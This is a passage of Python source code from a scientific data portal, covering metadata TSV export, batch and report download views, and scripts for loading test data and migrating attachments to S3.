lambda exp: format_experiment(exp, exp_set, exp_set_row_vals),
exp_set.get('experiments_in_set', [])
)
),
chain.from_iterable(
map(
lambda f: format_file(f, exp_set, dict(exp_set_row_vals, **{ 'Experiment Accession' : 'NONE' }), exp_set, exp_set_row_vals),
exp_set.get('processed_files', []) + flatten_other_processed_files(exp_set.get('other_processed_files', []))
)
)
), key=sort_files_from_expset_by_replicate_numbers)
def format_experiment(exp, exp_set, exp_set_row_vals):
'''
:returns Iterable of dictionaries which represent File item rows, with column headers as keys.
'''
exp_row_vals = {}
exp_cols = [ col for col in header if TSV_MAPPING[col][0] == EXP ]
for column in exp_cols:
exp_row_vals[column] = get_value_for_column(exp, column)
return chain(
chain.from_iterable(
map(
lambda f: format_file(f, exp, exp_row_vals, exp_set, exp_set_row_vals),
sorted(exp.get('files', []), key=lambda d: d.get("accession")) + sorted(exp.get('processed_files', []), key=lambda d: d.get("accession")) + sorted(flatten_other_processed_files(exp.get('other_processed_files', [])), key=lambda d: d.get("accession"))
)
),
# ref files should be iterated after the end of exp's raw and
# processed files iteration since we do decision whether to include the ref. files or not
chain.from_iterable(
map(
lambda f: format_file(dict(f, **{ 'reference_file_for' : exp.get('accession') }), exp, exp_row_vals, exp_set, exp_set_row_vals),
sorted(exp.get('reference_files', []), key=lambda d: d.get("accession"))
)
)
)
def format_file(f, exp, exp_row_vals, exp_set, exp_set_row_vals):
'''
:returns List of dictionaries which represent File item rows, with column headers as keys.
'''
files_returned = [] # Function output
f['href'] = request.host_url + f.get('href', '')
f_row_vals = {}
file_cols = [ col for col in header if TSV_MAPPING[col][0] == FILE or TSV_MAPPING[col][0] == FILE_ONLY ]
for column in file_cols:
f_row_vals[column] = get_value_for_column(f, column)
all_row_vals = dict(exp_set_row_vals, **dict(exp_row_vals, **f_row_vals)) # Combine data from ExpSet, Exp, and File
# Some extra fields to decide whether to include exp's reference files or not
#
# IMPORTANT: since we add the Supplementary Files download option in Exp Set, users can download reference files directly.
# So directly downloaded reference files should not be considered as 'reference file for' of an experiment)
if not any(triple[2] == f.get('accession', '') for triple in accession_triples) and 'reference_file_for' in f:
all_row_vals['Related File Relationship'] = 'reference file for'
all_row_vals['Related File'] = 'Experiment - ' + f.get('reference_file_for', '')
if not all_row_vals.get('File Classification'):
all_row_vals['File Classification'] = f.get('file_classification', '')
# If no EXP properties, likely is processed file from an ExpSet, so show all Exps' values.
exp_col_names = [ k for k,v in TSV_MAPPING.items() if v[0] == EXP ]
for column in exp_col_names:
if all_row_vals.get(column) is None or ('Accession' in column and all_row_vals.get(column) == 'NONE'):
vals = []
for field in TSV_MAPPING[column][1]:
vals.append(', '.join(get_values_for_field(exp_set, 'experiments_in_set.' + field)))
all_row_vals[column] = ', '.join(vals)
# Add Bio & Tech Rep Nos re: all_row_vals['Experiment Accession']
all_row_vals['Tech Rep No'] = get_correct_rep_no('Tech Rep No', all_row_vals, exp_set)
all_row_vals['Bio Rep No'] = get_correct_rep_no('Bio Rep No', all_row_vals, exp_set)
# If we do not have any publication info carried over from ExpSet, list out lab.correspondence instead
if not all_row_vals.get('Publication'):
lab_correspondence = exp_set.get('lab', {}).get('correspondence', [])
if len(lab_correspondence) > 0:
contact_emails = []
for contact in lab_correspondence:
decoded_email = b64decode(contact['contact_email'].encode('utf-8')).decode('utf-8') if contact.get('contact_email') else None
if decoded_email:
contact_emails.append(decoded_email)
all_row_vals['Publication'] = "Correspondence: " + ", ".join(contact_emails)
# Add file to our return list which is to be bubbled upwards to iterable.
files_returned.append(all_row_vals)
# Add attached secondary files, if any; copies most values over from primary file & overrides distinct File Download URL, md5sum, etc.
if f.get('extra_files') and len(f['extra_files']) > 0:
for xfile in f['extra_files']:
if xfile.get('use_for') == 'visualization':
continue
xfile_vals = all_row_vals.copy()
xfile_vals['File Download URL'] = request.host_url + xfile['href'] if xfile.get('href') else None
xfile_vals['File Format'] = xfile.get('file_format', {}).get('display_title')
xfile_vals['md5sum'] = xfile.get('md5sum')
xfile_vals['Size (MB)'] = xfile.get('file_size')
xfile_vals['Related File Relationship'] = 'secondary file for'
xfile_vals['Related File'] = all_row_vals.get('File Accession')
files_returned.append(xfile_vals)
return files_returned
def post_process_file_row_dict(file_row_dict_tuple):
idx, file_row_dict = file_row_dict_tuple
if file_row_dict['Related File Relationship'] == 'secondary file for':
summary['lists']['Extra Files'].append(('Secondary file for ' + file_row_dict.get('Related File', 'unknown file.'), file_row_dict ))
elif file_row_dict['Related File Relationship'] == 'reference file for':
summary['lists']['Reference Files'].append(('Reference file for ' + file_row_dict.get('Related File', 'unknown exp.'), file_row_dict ))
if not file_row_dict['File Type']:
file_row_dict['File Type'] = 'other'
if file_row_dict['File Download URL'] is None:
file_row_dict['File Download URL'] = '### No URL currently available'
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('No URL available', file_row_dict ))
return file_row_dict
if file_cache.get(file_row_dict['File Download URL']) is not None:
row_num_duplicated = file_cache[file_row_dict['File Download URL']] + 3
file_row_dict['File Download URL'] = '### Duplicate of row ' + str(row_num_duplicated) + ': ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Duplicate Files'].append(('Duplicate of row ' + str(row_num_duplicated), file_row_dict ))
return file_row_dict
# remove repeating/redundant lab info in Contributing Lab
if (file_row_dict['Contributing Lab'] is not None and file_row_dict['Contributing Lab'] != '' and
(file_row_dict['Contributing Lab'] == file_row_dict['Experimental Lab'] or
file_row_dict['Contributing Lab'] == file_row_dict['Generating Lab'])):
file_row_dict['Contributing Lab'] = ''
file_cache[file_row_dict['File Download URL']] = idx
if('Size (MB)' in file_row_dict and file_row_dict['Size (MB)'] != None and file_row_dict['Size (MB)'] != ''):
file_row_dict['Size (MB)'] = format(
float(file_row_dict['Size (MB)']) / (1024 * 1024), '.2f')
if file_row_dict['File Status'] in ['uploading', 'to be uploaded', 'upload failed']:
file_row_dict['File Download URL'] = '### Not Yet Uploaded: ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('Not yet uploaded', file_row_dict ))
return file_row_dict
if file_row_dict['File Status'] == 'restricted':
file_row_dict['File Download URL'] = '### Restricted: ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('Restricted', file_row_dict ))
return file_row_dict
summary['counts']['Total Unique Files to Download'] += 1
summary['counts']['Total Files'] += 1
return file_row_dict
def format_filter_resulting_file_row_dicts(file_row_dict_iterable):
return map(
post_process_file_row_dict,
enumerate(filter(should_file_row_object_be_included, file_row_dict_iterable))
)
def generate_summary_lines():
ret_rows = [
['###', '', ''],
['###', 'Summary', ''],
['###', '', ''],
['###', 'Files Selected for Download:', '', '', str(summary['counts']['Files Selected for Download'] or 'All'), ''],
['###', 'Total File Rows:', '', '', str(summary['counts']['Total Files']), ''],
['###', 'Unique Downloadable Files:', '', '', str(summary['counts']['Total Unique Files to Download']), '']
]
def gen_mini_table(file_tuples):
for idx, file_tuple in enumerate(file_tuples[0:5]):
ret_rows.append(['###', ' - Details:' if idx == 0 else '', file_tuple[1]['File Accession'] + '.' + file_tuple[1]['File Format'], file_tuple[0] ])
if len(file_tuples) > 5:
ret_rows.append(['###', '', 'and ' + str(len(file_tuples) - 5) + ' more...', ''])
if len(summary['lists']['Extra Files']) > 0:
ret_rows.append(['###', '- Added {} extra file{} which {} attached to a primary selected file (e.g. pairs_px2 index file with a pairs file):'.format(str(len(summary['lists']['Extra Files'])), 's' if len(summary['lists']['Extra Files']) > 1 else '', 'are' if len(summary['lists']['Extra Files']) > 1 else 'is'), '', '', '', ''])
gen_mini_table(summary['lists']['Extra Files'])
if len(summary['lists']['Reference Files']) > 0:
ret_rows.append(['###', '- Added {} reference file{} which {} attached to an experiment:'.format(str(len(summary['lists']['Reference Files'])), 's' if len(summary['lists']['Reference Files']) > 1 else '', 'are' if len(summary['lists']['Reference Files']) > 1 else 'is'), '', '', '', ''])
gen_mini_table(summary['lists']['Reference Files'])
if len(summary['lists']['Duplicate Files']) > 0:
ret_rows.append(['###', '- Commented out {} duplicate file{} (e.g. a raw file shared by two experiments):'.format(str(len(summary['lists']['Duplicate Files'])), 's' if len(summary['lists']['Duplicate Files']) > 1 else ''), '', '', '', ''])
gen_mini_table(summary['lists']['Duplicate Files'])
if len(summary['lists']['Not Available']) > 0:
ret_rows.append(['###', '- Commented out {} file{} which are currently not available (i.e. file restricted, or not yet finished uploading):'.format(str(len(summary['lists']['Not Available'])), 's' if len(summary['lists']['Not Available']) > 1 else ''), '', '', '', ''])
gen_mini_table(summary['lists']['Not Available'])
# add unauthenticated download is not permitted warning
ret_rows.append(['###', '', '', '', '', '', ''])
ret_rows.append(['###', 'IMPORTANT: As of October 15, 2020, you must include an access key in your cURL command for bulk downloads. You can configure the access key in your profile. If you do not already have an account, you can log in with your Google or GitHub credentials.', '', '', '', ''])
return ret_rows
def stream_tsv_output(file_row_dictionaries):
'''
Generator which converts file-metatada dictionaries into a TSV stream.
:param file_row_dictionaries: Iterable of dictionaries, each containing TSV_MAPPING keys and values from a file in ExperimentSet.
'''
line = DummyFileInterfaceImplementation()
writer = csv.writer(line, delimiter='\t')
# Initial 2 lines: Intro, Headers
writer.writerow([
'###', 'N.B.: File summary located at bottom of TSV file.', '', '', '', '',
'Suggested command to download: ', '', '', 'cut -f 1 ./{} | tail -n +3 | grep -v ^# | xargs -n 1 curl -O -L --user <access_key_id>:<access_key_secret>'.format(filename_to_suggest)
])
yield line.read().encode('utf-8')
writer.writerow([column.strip() for column in header])
yield line.read().encode('utf-8')
for file_row_dict in file_row_dictionaries:
writer.writerow([ file_row_dict.get(column) or 'N/A' for column in header ])
yield line.read().encode('utf-8')
for summary_line in generate_summary_lines():
writer.writerow(summary_line)
yield line.read().encode('utf-8')
if not endpoints_initialized['metadata']: # For some reason first result after bootup returns empty, so we do once extra for first request.
initial_path = '{}?{}'.format(search_path, urlencode(dict(search_params, limit=10), True))
endpoints_initialized['metadata'] = True
request.invoke_subrequest(make_search_subreq(request, initial_path), False)
# Prep - use dif functions if different type requested.
if search_params['type'][0:13] == 'ExperimentSet':
iterable_pipeline = format_filter_resulting_file_row_dicts(
chain.from_iterable(
map(
format_experiment_set,
get_iterable_search_results(request, search_path, search_params)
)
)
)
elif search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
iterable_pipeline = format_filter_resulting_file_row_dicts(
chain.from_iterable(
map(
lambda f: format_file(f, {}, {}, {}, {}),
get_iterable_search_results(request, search_path, search_params)
)
)
)
else:
raise HTTPBadRequest("Metadata can only be retrieved currently for Experiment Sets or Files. Received \"" + search_params['type'] + "\"")
return Response(
content_type='text/tsv',
app_iter = stream_tsv_output(iterable_pipeline),
content_disposition='attachment;filename="%s"' % filename_to_suggest
)
@view_config(route_name="metadata_redirect", request_method='GET')
@debug_log
def redirect_new_metadata_route(context, request):
return HTTPMovedPermanently(
location='/metadata/?' + request.matchdict['search_params'],
comment="Redirected to current metadata route."
)
@view_config(route_name='batch_download', request_method='GET')
@debug_log
def batch_download(context, request):
# adding extra params to get required columns
param_list = parse_qs(request.matchdict['search_params'])
param_list['field'] = ['files.href', 'files.file_type']
param_list['limit'] = ['all']
path = '/search/?%s' % urlencode(param_list, True)
results = request.embed(path, as_user=True)
metadata_link = '{host_url}/metadata/{search_params}/metadata.tsv'.format(
host_url=request.host_url,
search_params=request.matchdict['search_params']
)
files = [metadata_link]
if 'files.file_type' in param_list:
for exp in results['@graph']:
for f in exp['files']:
if f['file_type'] in param_list['files.file_type']:
files.append('{host_url}{href}'.format(
host_url=request.host_url,
href=f['href']
))
else:
for exp in results['@graph']:
for f in exp['files']:
files.append('{host_url}{href}'.format(
host_url=request.host_url,
href=f['href']
))
return Response(
content_type='text/plain',
body='\n'.join(files),
content_disposition='attachment; filename="%s"' % 'files.txt'
)
def lookup_column_value(value, path):
nodes = [value]
names = path.split('.')
for name in names:
nextnodes = []
for node in nodes:
if name not in node:
continue
value = node[name]
if isinstance(value, list):
nextnodes.extend(value)
else:
nextnodes.append(value)
nodes = nextnodes
if not nodes:
return ''
# if we ended with an embedded object, show the @id
if nodes and hasattr(nodes[0], '__contains__') and '@id' in nodes[0]:
nodes = [node['@id'] for node in nodes]
seen = set()
deduped_nodes = [n for n in nodes if not (n in seen or seen.add(n))]
return u','.join(u'{}'.format(n) for n in deduped_nodes)
def format_row(columns):
"""Format a list of text columns as a tab-separated byte string."""
return b'\t'.join([bytes_(c, 'utf-8') for c in columns]) + b'\r\n'
@view_config(route_name='report_download', request_method='GET')
@debug_log
def report_download(context, request):
types = request.params.getall('type')
if len(types) != 1:
msg = 'Report view requires specifying a single type.'
raise HTTPBadRequest(explanation=msg)
the_type = types[0]
# Make sure we get all results
request.GET['limit'] = 'all'
the_schema = [request.registry[TYPES][the_type.schema]]
columns = build_table_columns(request, the_schema, [the_type])
header = [column.get('title') or field for field, column in columns.items()]
def generate_rows():
yield format_row(header)
for item in iter_search_results(context, request):
values = [lookup_column_value(item, path) for path in columns]
yield format_row(values)
# Stream response using chunked encoding.
request.response.content_type = 'text/tsv'
request.response.content_disposition = 'attachment;filename="%s"' % 'report.tsv'
request.response.app_iter = generate_rows()
return request.response
```
#### File: encoded/commands/load_data.py
```python
import argparse
import logging
import structlog
from dcicutils.env_utils import permit_load_data
from pyramid.paster import get_app
from pyramid.path import DottedNameResolver
from .. import configure_dbsession
log = structlog.getLogger(__name__)
EPILOG = __doc__
def load_data_should_proceed(env, allow_prod):
""" Returns True on whether or not load_data should proceed.
:param env: env we are on
:param allow_prod: prod argument from argparse, defaults to False
:return: True if load_data should continue, False otherwise
"""
return permit_load_data(envname=env, allow_prod=allow_prod, orchestrated_app='fourfront')
# # do not run on a production environment unless we set --prod flag
# if is_stg_or_prd_env(env) and not allow_prod:
# log.info('load_data: skipping, since we are on a production environment and --prod not used')
# return False
#
# # do not run on hotseat since it is a prod snapshot
# if 'hotseat' in env:
# log.info('load_data: skipping, since we are on hotseat')
# return False
#
# return True
def main():
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Load Test Data", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('config_uri', help="path to configfile")
parser.add_argument('--prod', action='store_true',
help="must be set to confirm this action is intended to happen on a production server")
parser.add_argument('--overwrite', action='store_true',
help="must be set to update existing uuids with patch")
args = parser.parse_args()
# get the pyramids app
app = get_app(args.config_uri, args.app_name)
# create db schema
configure_dbsession(app)
env = app.registry.settings.get('env.name', '')
load_test_data = app.registry.settings.get('load_test_data')
allow_prod = args.prod
log.info("load_data: load_test_data function is %s" % (load_test_data))
load_test_data = DottedNameResolver().resolve(load_test_data)
if load_data_should_proceed(env, allow_prod):
load_test_data(app, args.overwrite)
if __name__ == "__main__":
main()
```
#### File: encoded/commands/migrate_attachments_aws.py
```python
import copy
import logging
import transaction
from hashlib import md5
from pyramid.paster import get_app
from pyramid.threadlocal import manager
from pyramid.testing import DummyRequest
from snovault.interfaces import (
BLOBS,
DBSESSION
)
from snovault.storage import (
PropertySheet,
RDBBlobStorage,
)
EPILOG = __doc__
logger = logging.getLogger(__name__)
def run(app):
root = app.root_factory(app)
dummy_request = DummyRequest(root=root, registry=app.registry, _stats={})
manager.push({'request': dummy_request, 'registry': app.registry})
session = app.registry[DBSESSION]()
blob_storage = app.registry[BLOBS]
rdb_blobs = RDBBlobStorage(app.registry[DBSESSION])
for sheet in session.query(PropertySheet).filter(PropertySheet.name == 'downloads'):
# Copy the properties so sqlalchemy realizes it changed after it's mutated
properties = copy.deepcopy(sheet.properties)
download_meta = properties['attachment']
if 'bucket' not in download_meta:
# Re-writing the blob while the S3BlobStorage is in use
# will move it to S3.
data = rdb_blobs.get_blob(download_meta)
blob_id = download_meta.pop('blob_id')
download_meta['md5sum'] = md5(data).hexdigest()
blob_storage.store_blob(data, download_meta, blob_id=blob_id)
sheet.properties = properties
logger.info('Updated %s' % sheet.sid)
def main():
import argparse
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Move attachment blobs to S3", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('--abort', action='store_true', help="Rollback transaction")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
app = get_app(args.config_uri, args.app_name)
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
raised = False
try:
run(app)
except Exception:
raised = True
raise
finally:
if raised or args.abort:
transaction.abort()
logger.info('Rolled back.')
else:
transaction.commit()
if __name__ == '__main__':
main()
```
#### File: encoded/commands/run_upgrader_on_inserts.py
```python
import argparse
import logging
import json
from pkg_resources import resource_filename
logger = logging.getLogger(__name__)
EPILOG = __doc__
def get_inserts(inserts_folder_name='inserts', inserts_file_name='workflow'):
folder_name = resource_filename('encoded', 'tests/data/' + inserts_folder_name + '/')
f_name = folder_name + inserts_file_name + '.json'
with open(f_name) as f:
items = json.loads(f.read())
for insert_item in items:
yield insert_item
def main():
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Run inserts through an upgrader", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--inserts-folder', help="Folder to use to get the file of inserts from. E.g. 'master-inserts' or 'inserts'. Defaults to 'inserts'.")
parser.add_argument('item_type', help="Type of item or filename of inserts, in lowercase/schema-filename form, e.g. 'page', 'static_section'.")
parser.add_argument('upgrader_method_name', help="Name of upgrader method to use as it is defined in upgrade/<item_type> folder, e.g. 'workflow_3_4'.")
args = parser.parse_args()
upgrader_module = __import__('encoded.upgrade.' + args.item_type, fromlist=[''])
upgrader_fxn = getattr(upgrader_module, args.upgrader_method_name)
results = []
for item in get_inserts(args.inserts_folder or 'inserts', args.item_type):
upgrader_fxn(item, None) # Modifies in place
results.append(item)
print(json.dumps(results, indent=4, sort_keys=True)) # Return instead of print?
if __name__ == "__main__":
main()
```
#### File: src/encoded/loadxl.py
```python
import json
import magic
import mimetypes
import os
import structlog
import webtest
from base64 import b64encode
from dcicutils.misc_utils import ignored
from PIL import Image
from pkg_resources import resource_filename
from pyramid.paster import get_app
from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from .server_defaults import add_last_modified
text = type(u'')
logger = structlog.getLogger(__name__)
def includeme(config):
# provide an endpoint to do bulk uploading that just uses loadxl
config.add_route('load_data', '/load_data')
config.scan(__name__)
# order of items references with linkTo in a field in 'required' in schemas
ORDER = [
'user',
'award',
'lab',
'file_format',
'ontology',
'ontology_term', # validate_biosource_cell_line requires term_name
'experiment_type',
'biosource',
'biosample',
'organism', # allow the 'default' linkTo in individuals work
'workflow',
'vendor',
]
IS_ATTACHMENT = [
'attachment',
'file_format_specification',
]
LOADXL_USER_UUID = "3202fd57-44d2-44fb-a131-afb1e43d8ae5"
class LoadGenWrapper(object):
"""
Simple class that accepts a generator function and handles errors by
setting self.caught to the error message.
"""
def __init__(self, gen):
self.gen = gen
self.caught = None
def __iter__(self):
"""
Iterate through self.gen and see if 'ERROR: ' bytes are in any yielded
value. If so, store the error message as self.caught and raise
StopIteration to halt the generator.
"""
# self.caught = yield from self.gen
for iter_val in self.gen:
if b'ERROR:' in iter_val:
self.caught = iter_val.decode()
yield iter_val
def close(self):
if self.caught:
logger.error('load_data: failed to load with iter_response', error=self.caught)
@view_config(route_name='load_data', request_method='POST', permission='add')
@debug_log
def load_data_view(context, request):
"""
expected input data
{'local_path': path to a directory or file in file system
'fdn_dir': inserts folder under encoded
'store': if not local_path or fdn_dir, look for a dictionary of items here
'overwrite' (Bool): overwrite if existing data
'itype': (list or str): only pick some types from the source or specify type in in_file
'iter_response': invoke the Response as an app_iter, directly calling load_all_gen
'config_uri': user supplied configuration file}
post can contain 2 different styles of data
1) reference to a folder or file (local_path or fd_dir). If this is done
itype can be optionally used to specify type of items loaded from files
2) store in form of {'item_type': [items], 'item_type2': [items]}
item_type should be same as insert file names i.e. file_fastq
"""
ignored(context)
# this is a bit wierd but want to reuse load_data functionality so I'm rolling with it
config_uri = request.json.get('config_uri', 'production.ini')
patch_only = request.json.get('patch_only', False)
app = get_app(config_uri, 'app')
environ = {'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': 'TEST'}
testapp = webtest.TestApp(app, environ)
# expected response
request.response.status = 200
result = {
'status': 'success',
'@type': ['result'],
}
store = request.json.get('store', {})
local_path = request.json.get('local_path')
fdn_dir = request.json.get('fdn_dir')
overwrite = request.json.get('overwrite', False)
itype = request.json.get('itype')
iter_resp = request.json.get('iter_response', False)
inserts = None
from_json = False
if fdn_dir:
inserts = resource_filename('encoded', 'tests/data/' + fdn_dir + '/')
elif local_path:
inserts = local_path
elif store:
inserts = store
from_json = True
# if we want to iterate over the response to keep the connection alive
# this directly calls load_all_gen, instead of load_all
if iter_resp:
return Response(
content_type='text/plain',
app_iter=LoadGenWrapper(
load_all_gen(testapp, inserts, None, overwrite=overwrite,
itype=itype, from_json=from_json, patch_only=patch_only)
)
)
# otherwise, it is a regular view and we can call load_all as usual
if inserts:
res = load_all(testapp, inserts, None, overwrite=overwrite, itype=itype, from_json=from_json)
else:
res = 'No uploadable content found!'
if res: # None if load_all is successful
print(LOAD_ERROR_MESSAGE)
request.response.status = 422
result['status'] = 'error'
result['@graph'] = str(res)
return result
def trim(value):
"""Shorten excessively long fields in error log."""
if isinstance(value, dict):
return {k: trim(v) for k, v in value.items()}
if isinstance(value, list):
return [trim(v) for v in value]
if isinstance(value, str) and len(value) > 160:
return value[:77] + '...' + value[-80:]
return value
def find_doc(docsdir, filename):
"""tries to find the file, if not returns false."""
path = None
if not docsdir:
return
for dirpath in docsdir:
candidate = os.path.join(dirpath, filename)
if not os.path.exists(candidate):
continue
if path is not None:
msg = 'Duplicate filenames: %s, %s' % (path, candidate)
raise ValueError(msg)
path = candidate
if path is None:
return
return path
def attachment(path):
"""Create an attachment upload object from a filename Embeds the attachment as a data url."""
filename = os.path.basename(path)
mime_type, encoding = mimetypes.guess_type(path)
major, minor = mime_type.split('/')
try:
detected_type = magic.from_file(path, mime=True).decode('ascii')
except AttributeError:
detected_type = magic.from_file(path, mime=True)
# XXX This validation logic should move server-side.
if not (detected_type == mime_type or
detected_type == 'text/plain' and major == 'text'):
raise ValueError('Wrong extension for %s: %s' % (detected_type, filename))
with open(path, 'rb') as stream:
attach = {'download': filename,
'type': mime_type,
'href': 'data:%s;base64,%s' % (mime_type, b64encode(stream.read()).decode('ascii'))}
if mime_type in ('application/pdf', "application/zip", 'text/plain',
'text/tab-separated-values', 'text/html', 'application/msword', 'application/vnd.ms-excel',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'):
# XXX Should use chardet to detect charset for text files here.
return attach
if major == 'image' and minor in ('png', 'jpeg', 'gif', 'tiff'):
# XXX we should just convert our tiffs to pngs
stream.seek(0, 0)
im = Image.open(stream)
im.verify()
if im.format != minor.upper():
msg = "Image file format %r does not match extension for %s"
raise ValueError(msg % (im.format, filename))
attach['width'], attach['height'] = im.size
return attach
raise ValueError("Unknown file type for %s" % filename)
def format_for_attachment(json_data, docsdir):
for field in IS_ATTACHMENT:
if field in json_data:
if isinstance(json_data[field], dict):
pass
elif isinstance(json_data[field], str):
path = find_doc(docsdir, json_data[field])
if not path:
del json_data[field]
logger.error('Removing {} form {}, expecting path'.format(field, json_data['uuid']))
else:
json_data[field] = attachment(path)
else:
# malformatted attachment
del json_data[field]
logger.error('Removing {} form {}, expecting path'.format(field, json_data['uuid']))
return json_data
LOAD_ERROR_MESSAGE = """# ██▓ ▒█████ ▄▄▄ ▓█████▄ ██▓ ███▄ █ ▄████
# ▓██▒ ▒██▒ ██▒▒████▄ ▒██▀ ██▌▓██▒ ██ ▀█ █ ██▒ ▀█▒
# ▒██░ ▒██░ ██▒▒██ ▀█▄ ░██ █▌▒██▒▓██ ▀█ ██▒▒██░▄▄▄░
# ▒██░ ▒██ ██░░██▄▄▄▄██ ░▓█▄ ▌░██░▓██▒ ▐▌██▒░▓█ ██▓
# ░██████▒░ ████▓▒░ ▓█ ▓██▒░▒████▓ ░██░▒██░ ▓██░░▒▓███▀▒
# ░ ▒░▓ ░░ ▒░▒░▒░ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▓ ░ ▒░ ▒ ▒ ░▒ ▒
# ░ ░ ▒ ░ ░ ▒ ▒░ ▒ ▒▒ ░ ░ ▒ ▒ ▒ ░░ ░░ ░ ▒░ ░ ░
# ░ ░ ░ ░ ░ ▒ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
# ░
# ██▓ ███▄ █ ██████ ▓█████ ██▀███ ▄▄▄█████▓ ██████
# ▓██▒ ██ ▀█ █ ▒██ ▒ ▓█ ▀ ▓██ ▒ ██▒▓ ██▒ ▓▒▒██ ▒
# ▒██▒▓██ ▀█ ██▒░ ▓██▄ ▒███ ▓██ ░▄█ ▒▒ ▓██░ ▒░░ ▓██▄
# ░██░▓██▒ ▐▌██▒ ▒ ██▒▒▓█ ▄ ▒██▀▀█▄ ░ ▓██▓ ░ ▒ ██▒
# ░██░▒██░ ▓██░▒██████▒▒░▒████▒░██▓ ▒██▒ ▒██▒ ░ ▒██████▒▒
# ░▓ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ▒▓ ░▒▓░ ▒ ░░ ▒ ▒▓▒ ▒ ░
# ▒ ░░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒ ░ ░
# ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░
#
# █████▒▄▄▄ ██▓ ██▓ ▓█████ ▓█████▄
# ▓██ ▒▒████▄ ▓██▒▓██▒ ▓█ ▀ ▒██▀ ██▌
# ▒████ ░▒██ ▀█▄ ▒██▒▒██░ ▒███ ░██ █▌
# ░▓█▒ ░░██▄▄▄▄██ ░██░▒██░ ▒▓█ ▄ ░▓█▄ ▌
# ░▒█░ ▓█ ▓██▒░██░░██████▒░▒████▒░▒████▓
# ▒ ░ ▒▒ ▓▒█░░▓ ░ ▒░▓ ░░░ ▒░ ░ ▒▒▓ ▒
# ░ ▒ ▒▒ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒
# ░ ░ ░ ▒ ▒ ░ ░ ░ ░ ░ ░ ░
# ░ ░ ░ ░ ░ ░ ░ ░
# ░ """
def load_all(testapp, inserts, docsdir, overwrite=True, itype=None, from_json=False, patch_only=False):
"""
Wrapper function for load_all_gen, which invokes the generator returned
from that function. Takes all of the same args as load_all_gen, so
please reference that docstring.
This function uses LoadGenWrapper, which will catch a returned value from
the execution of the generator, which is an Exception in the case of
load_all_gen. Return that Exception if encountered, which is consistent
with the functionality of load_all_gen.
"""
gen = LoadGenWrapper(
load_all_gen(testapp, inserts, docsdir, overwrite, itype, from_json, patch_only)
)
# run the generator; don't worry about the output
for _ in gen:
pass
# gen.caught is None for success and an error message on failure
if gen.caught is None:
return None
else:
return Exception(gen.caught)
def load_all_gen(testapp, inserts, docsdir, overwrite=True, itype=None, from_json=False, patch_only=False):
"""
Generator function that yields bytes information about each item POSTed/PATCHed.
Is the base functionality of load_all function.
convert data to store format dictionary (same format expected from from_json=True),
assume main function is to load reasonable number of inserts from a folder
Args:
testapp
inserts : either a folder, file, or a dictionary in the store format
docsdir : attachment folder
overwrite (bool) : if the database contains the item already, skip or patch
itype (list or str): limit selection to certain type/types
from_json (bool) : if set to true, inserts should be dict instead of folder name
patch_only (bool) : if set to true will only do second round patch - no posts
Yields:
Bytes with information on POSTed/PATCHed items
Returns:
None if successful, otherwise a bytes error message
"""
# TODO: deal with option of file to load (not directory struture)
if docsdir is None:
docsdir = []
# Collect Items
store = {}
if from_json: # we are directly loading json
store = inserts
if not from_json: # we are loading a file
use_itype = False
if os.path.isdir(inserts): # we've specified a directory
if not inserts.endswith('/'):
inserts += '/'
files = [i for i in os.listdir(inserts) if i.endswith('.json')]
elif os.path.isfile(inserts): # we've specified a single file
files = [inserts]
# use the item type if provided AND not a list
# otherwise guess from the filename
use_itype = True if (itype and isinstance(itype, str)) else False
else: # cannot get the file
err_msg = 'Failure loading inserts from %s. Could not find matching file or directory.' % inserts
print(err_msg)
yield str.encode('ERROR: %s\n' % err_msg)
return
# raise StopIteration
# load from the directory/file
for a_file in files:
if use_itype:
item_type = itype
else:
item_type = a_file.split('/')[-1].replace(".json", "")
a_file = inserts + a_file
with open(a_file) as f:
store[item_type] = json.loads(f.read())
# if there is a defined set of items, subtract the rest
if itype:
if isinstance(itype, list):
store = {i: store[i] for i in itype if i in store}
else:
store = {itype: store.get(itype, [])}
# clear empty values
store = {k: v for k, v in store.items() if v is not None}
if not store:
if from_json:
err_msg = 'No items found in input "store" json'
else:
err_msg = 'No items found in %s' % inserts
if itype:
err_msg += ' for item type(s) %s' % itype
print(err_msg)
yield str.encode('ERROR: %s' % err_msg)
return
# raise StopIteration
# order Items
all_types = list(store.keys())
for ref_item in reversed(ORDER):
if ref_item in all_types:
all_types.insert(0, all_types.pop(all_types.index(ref_item)))
# collect schemas
